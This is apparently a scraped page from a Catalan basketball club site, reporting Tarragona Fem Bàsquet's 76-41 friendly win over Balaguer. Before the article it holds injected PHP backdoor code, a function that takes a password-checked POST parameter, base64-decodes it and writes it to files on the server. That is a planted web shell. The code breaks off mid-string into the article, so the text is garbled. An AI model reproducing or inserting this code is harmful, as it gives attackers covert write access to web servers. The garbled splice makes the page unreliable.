function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Tarragona Fem Bàsquet tanca els amistosos amb una clara victòria contra el Balaguer (76-41) - Tgn Bàsquet Club -

El Tarragona Fem Bàsquet tanca els amistosos amb una clara victòria contra el Balaguer (76-41)

Updated: setembre 18, 2016

El Tarragona Fem Bàsquet va vèncer el Balaguer — equip de Primera Catalana— en l’últim amistós del conjunt lila abans de l’inici de la competició (76-41) — de fet, la lliga havia de començar aquest cap de setmana però el rival del Tarragona Fem Bàsquet, el Cerdanyola va demanar suspendre el matx fins a nova data per culpa d’un problema de salut de la seva entrenadora—. L’equip que entrena Albert del Rey es va imposar amb claredat al seu adversari amb les mateixes armes que el dia anterior li havien servit per desfer-se del Romareda (87-29): velocitat en la circulació de pilota, pressió en les línies de passada rival, ràpid contraatac i força dins la zona. Com en el cas del conjunt aragonès, el partit es va decidir ben aviat. El Tarragona Fem Bàsquet va fer una gran sortida i al final del primer quart el marcador mostrava un resultat de 18-14.

Va ser en el segon període on el matx es va decantar cap al bàndol local. El Tarragona Fem Bàsquet va fer un parcial aclaparador de 19-0 que va deixar el resultat al descans en 37-14. La pressió defensiva local era molt bona i el Balaguer va perdre un munt de pilotes abans d’arribar a zona d’atac fins i tot. Cal destacar altra vegada Marina Romeu que, tot i que la vara de mesurar s’haurà de posar en la competició oficial, va demostrar que és la jugadora més en forma de l’equip. Encert en el tir exterior, decisió a l’hora d’atacar l’anella i les rivals, gran lectura del joc i solidesa defensiva.

El Balaguer va despertar en el tercer període. Les jugadores visitants s’havien espolsat la pressió i fan encadenar una sèrie de meritòries jugades ofensives que van impedir que la diferència fos més gran (58-30). Amb tot, la defensa i el contraatac del Tarragona Fem Bàsquet van aparèixer en els últims cinc minuts del matx i l’avantatge va tornar a ser abismal.